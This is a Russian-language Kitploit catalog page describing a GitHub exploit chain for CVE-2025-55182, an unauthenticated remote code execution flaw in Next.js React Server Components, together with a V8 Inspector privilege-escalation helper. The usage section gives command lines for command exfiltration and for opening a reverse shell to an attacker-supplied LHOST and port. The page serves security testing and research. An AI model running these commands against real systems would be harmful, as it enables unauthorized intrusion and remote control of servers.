Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182 — Автономный эксплойт для CVE-2025-55182, реализующий неаутентифицированное удалённое выполнение кода (RCE) в Next.js App Router через десериализацию Flight в React Server Components, с обратной оболочкой и вспомогательным инструментом для повышения привилегий через Node.js V8 Inspector. | Kitploit
Инструменты/GitHubGitHub/r3vpwnx/cve-2025-55182
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubr3vpwnx/cve-2025-55182

CVE-2025-55182

Репозиторий
1 день назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Автономный эксплойт для CVE-2025-55182, реализующий неаутентифицированное удалённое выполнение кода (RCE) в Next.js App Router через десериализацию Flight в React Server Components, с обратной оболочкой и вспомогательным инструментом для повышения привилегий через Node.js V8 Inspector.

Поделиться

CVE-2025-55182 - React2Shell (CVE-2025-55182) неаутентифицированное удалённое выполнение кода через десериализацию Flight в React Server Components

Автономный эксплойт для CVE-2025-55182 в приложениях Next.js App Router, использующих React Server Components. Специально сформированные RSC Flight-полезные нагрузки, отправляемые на endpoint server-action, обеспечивают неаутентифицированное удалённое выполнение кода. Включает вспомогательный инструмент локального повышения привилегий Node.js V8 Inspector (debug-port), который выполняет код в привилегированном процессе через обход песочницы process.mainModule.require.

CVE: CVE-2025-55182

Требования

root@kitploit:~
python3 -m pip install requests    # для Python PoC

Использование

cdp_privesc.py

root@kitploit:~
python3 cdp_privesc.py <target>

react2shell-poc.py (RSC RCE — встроенный, см. Credits)

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"          # эксфильтрация команд на основе ошибок
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost LHOST --lport 4444

Ссылки

  • https://github.com/p3ta00/react2shell-poc
  • https://www.tenable.com/blog/react2shell-cve-2025-55182-react-server-components-rce

Credits

react2shell-poc.py — это публичный PoC для CVE-2025-55182 от p3ta00, включённый без изменений из https://github.com/p3ta00/react2shell-poc для создания автономной цепочки. cdp_privesc.py (локальное повышение привилегий через Node.js V8 Inspector) — оригинальная разработка.

Отказ от ответственности

Только для авторизованного тестирования безопасности и образовательных целей. Запускайте это только против систем, которыми вы владеете или на тестирование которых имеете явное письменное разрешение.


Автор: r3vpwnx

Скачать инструмент